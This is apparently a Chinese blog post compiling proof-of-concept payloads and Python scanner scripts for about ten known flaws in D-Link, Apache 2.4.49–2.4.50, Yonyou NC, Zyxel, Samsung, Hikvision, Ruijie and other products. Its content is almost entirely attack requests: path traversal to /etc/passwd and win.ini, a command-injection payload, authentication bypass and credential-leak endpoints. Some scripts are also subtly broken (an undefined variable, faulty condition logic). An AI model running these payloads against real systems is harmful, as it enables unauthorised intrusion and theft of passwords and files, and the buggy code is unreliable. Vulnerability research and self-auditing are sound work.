声明:
此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。请阅读文末声明
D-Link-DIR路由器 账号密码信息泄露漏洞
poc:
/getcfg.php
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
页面原型:
漏洞检测:
输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图
用户名以及密码就出来了
脚本参考如下:
import requests
url=input("输入url\n>>>>>>>>")+"/getcfg.php"
header={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
"Cookie":"",
"X-Forwarded-For":"127.0.0.1"
}
data = ("SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a")
response=requests.post(url,data=data,headers=header,verify=False,timeout=10)
print(response.text)
if "DEVICE.ACCOUNT" in response.text and response.status_code == 200:
print("[" + url + "]" + "[===存在漏洞===]")
else:
print("["+url+"]"+"[不存在漏洞]")
CVE-2021-41773/42013 Apache HTTP Server任意文件读取漏洞
POC:
/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
影响版本:
Apache/2.4.49-2.4.50
页面原型:
漏洞检测:
检测脚本示例:
import urllib.request
from requests.packages.urllib3.exceptions import InsecureRequestWarning
url = input("输入测试地址\n>>>") + "/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
request = urllib.request.Request(url=url, headers=header)
response = urllib.request.urlopen(request, timeout=10)
html = response.read().decode('utf-8')
if "root" in html or "nologin" in html:
print(html)
print("[" + url + "]" + "[===存在Apache HTTP Server任意文件读取漏洞===]")
else:
print("[" + url + "]" + "[不存在Apache HTTP Server任意文件读取漏洞]")
except Exception as e:
print("[" + target_url + "]" + "[不存在漏洞]", format(e))
用友ERP-NC 目录遍历漏洞检测
POC
/NCFindWeb?service=IPreAlertConfigService&filename=
页面原型:
漏洞检测:
此处展示的是存在的文件,可以直接访问,查阅代码
脚本示例:
import requests
url = input("输入测试地址\n>>>") + "/NCFindWeb?service=IPreAlertConfigService&filename="
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
response = requests.get(url=url, headers=header, verify=False, timeout=10)
if "error.jsp" in response.text or "helpmain.jsp" in response.text or "login.jsp" in response.text and response.status_code == 200:
print(response.text)
print("[" + url + "]" + "[===存在用友 ERP-NC 目录遍历漏洞漏洞===]")
else:
print("[" + url + "]" + "[不存在用友 ERP-NC 目录遍历漏洞漏洞]")
except Exception as e:
print("[" + target_url + "]" + "[不存在漏洞]", format(e))
360天擎信息泄露漏洞检测
POC
/api/dbstat/gettablessize
页面原型:
漏洞检测:
脚本示例:
import requests
url = input("输入测试地址\n>>>") + "/api/dbstat/gettablessize"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
response = requests.get(url=url, headers=header, verify=False, timeout=10)
if "schema_name" in response.text or "table_name" in response.text or "table_size" in response.text and response.status_code == 200:
print(response.text)
print("[" + url + "]" + "[===存在360天擎信息泄露漏漏洞===]")
else:
print("[" + url + "]" + "[不存在360天擎信息泄露漏漏洞]")
except Exception as e:
print("[" + url + "]" + "[不存在漏洞]", format(e))
Zyxel NBG2105身份验证绕过漏洞
POC
/login_ok.htm
直接访问此接口即可
页面原型:
漏洞检测:
脚本示例:
import requests
url = input("输入测试地址\n>>>") +"/login_ok.htm"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
response = requests.get(url=url, headers=header, verify=False, timeout=10)
if "ZyXEL" in response.text and response.status_code == 200:
print("[" + url + "]" + "[===存在Zyxel NBG2105身份验证绕过漏洞===]")
else:
print("[" + url + "]" + "[不存在Zyxel NBG2105身份验证绕过漏洞]")
except Exception as e:
print("[" + url + "]" + "[不存在漏洞]", format(e))
三星WLAN AP WEA453e路由器远程命令执行漏洞
POC
/(download)/tmp/a.txt
command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
页面原型:
漏洞检测:
输入任意用户名密码,点击登陆,而后拦截数据包伪造数据如下
脚本示例:
import requests
url = input("输入测试地址\n>>>")+ "/(download)/tmp/a.txt"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
data = ("command1=shell:cat /etc/passwd| dd of=/tmp/a.txt")
try:
response = requests.post(url=url, headers=header, data=data, verify=False, timeout=10)
if "bin" in response.text or "bash" in response.text or "nologin" in response.text and response.status_code == 200:
print(response.text)
print("[" + url + "]" + "[===存在三星WLAN AP WEA453e路由器远程命令执行漏洞===]")
else:
print("[" + url + "]" + "[不存在三星WLAN AP WEA453e路由器远程命令执行漏洞]")
except Exception as e:
print("[" + url + "]" + "[不存在漏洞]", format(e))
三星路由器本地包含漏洞
POC
/(download)/etc/passwd
页面原型:
漏洞检测:
脚本示例:
import requests
url = input("输入测试地址\n>>>") + "/(download)/etc/passwd"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
response = requests.get(url=url, headers=header, verify=False, timeout=10)
if "bin" in response.text or "bash" in response.text or "nologin" in response.text and response.status_code == 200:
print(response.text)
print("[" + url + "]" + "[===存在三星路由器本地包含漏洞===]")
else:
print("[" + url + "]" + "[不存在三星路由器本地包含漏洞]")
except Exception as e:
print("[" + target_url + "]" + "[不存在漏洞]", format(e))
存在好视通视频会议平台任意文件下载漏洞
POC
/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
页面原型:
漏洞检测:
脚本示例:
import requests
url = input("输入测试地址\n>>>") + "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
response = requests.get(url=url, headers=header, verify=False, timeout=10)
if "for 16-bit app support" in response.text or "MAPI=1" in response.text and response.status_code == 200:
print(response.text)
print("[" + url + "]" + "[===存在好视通视频会议平台任意文件下载漏洞===]")
else:
print("[" + url + "]" + "[不存在好视通视频会议平台任意文件下载漏洞]")
except Exception as e:
print("[" + url + "]" + "[不存在漏洞]", format(e))
锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞
POC
f12查看源码
页面原型:
漏洞检测:
脚本示例:
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
url = input("输入测试地址\n>>>")
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=url, headers=header, verify=False, timeout=5)
if "super_admin" in response.text or "auth_method" in response.text and response.status_code == 200:
name = re.findall('"name":\"(.*)\"', response.text)
print(name)
print("[" + url + "]" + "[===存在锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞===]")
else:
print("[" + url + "]" + "[不存在锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞]")
except Exception as e:
print("[" + url + "]" + "[不存在漏洞]", format(e))
D-Link DSL-28881A 远程命令执行漏洞
POC
需要先登陆一次,失败后才可以
/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig
页面原型:
漏洞检测:
首先输入任意用户名密码,待提示登陆失败后继续进行下一步
而后访问漏洞页面
/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig
脚本示例:
import requests
url=input("输入测试地址\n>>>")
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
data = ("username=admin&password=a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3")
try:
response = requests.post(url=url, data=data, headers=header, verify=False, timeout=10)
url = url + "/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig"
response1 = requests.get(url=url, headers=header, verify=False, timeout=10)
if "Link encap" in response1.text or "br0" in response1.text or "Mask" in response1.text and response1.status_code == 200:
print(response1.text)
print("[" + url + "]" + "[===存在D-Link DSL-28881A 远程命令执行漏洞===]")
else:
print("[" + url + "]" + "[不存在D-Link DSL-28881A 远程命令执行漏洞]")
except Exception as e:
print("[" + url + "]" + "[不存在漏洞]", format(e))
HIKVISION 视频编码设备接入网关 任意文件下载漏洞
POC
/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php
页面原型:
漏洞检测:
脚本示例:
import requests
url=input("输入测试地址\n>>>")
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"X-Forwarded-For": "127.0.0.1"
}
try:
response = requests.post(url=url, headers=header, verify=False, timeout=10)
url = url + "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php"
response = requests.get(url=url, headers=header, verify=False, timeout=10)
if "<?php" in response.text or "$file_name" in response.text and response.status_code == 200:
print(response.text)
print("[" + url + "]" + "[===存在HIKVISION 视频编码设备接入网关 任意文件下载漏洞===]")
else:
print("[" + url + "]" + "[不存在HIKVISION 视频编码设备接入网关 任意文件下载漏洞]")
except Exception as e:
print("[" + url + "]" + "[不存在漏洞]", format(e))
本网站发布的项目中涉及的任何脚本,仅用于测试和学习研究,禁止用于商业用途,不能保证其合法性、准确性、完整性及有效性,请根据实际情况自行判断。
本网站对任何脚本及工具问题概不负责,包括但不限于由任何脚本错误导致的任何损失或损害。
间接使用本站中的任何工具及技术,包括但不限于漏洞挖掘或在某些行为违反国家/地区法律或相关法规的情况下进行传播,本网站对于由此引起的任何隐私泄漏或其他后果概不负责。
本网站保留随时更改或补充此免责声明的权利。一旦访问本网站项目,则视为
您已接受此免责声明。
您在本声明未发出之时点使用或者访问了该网站,则规为己接受此声明,请仔细阅读。
406
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
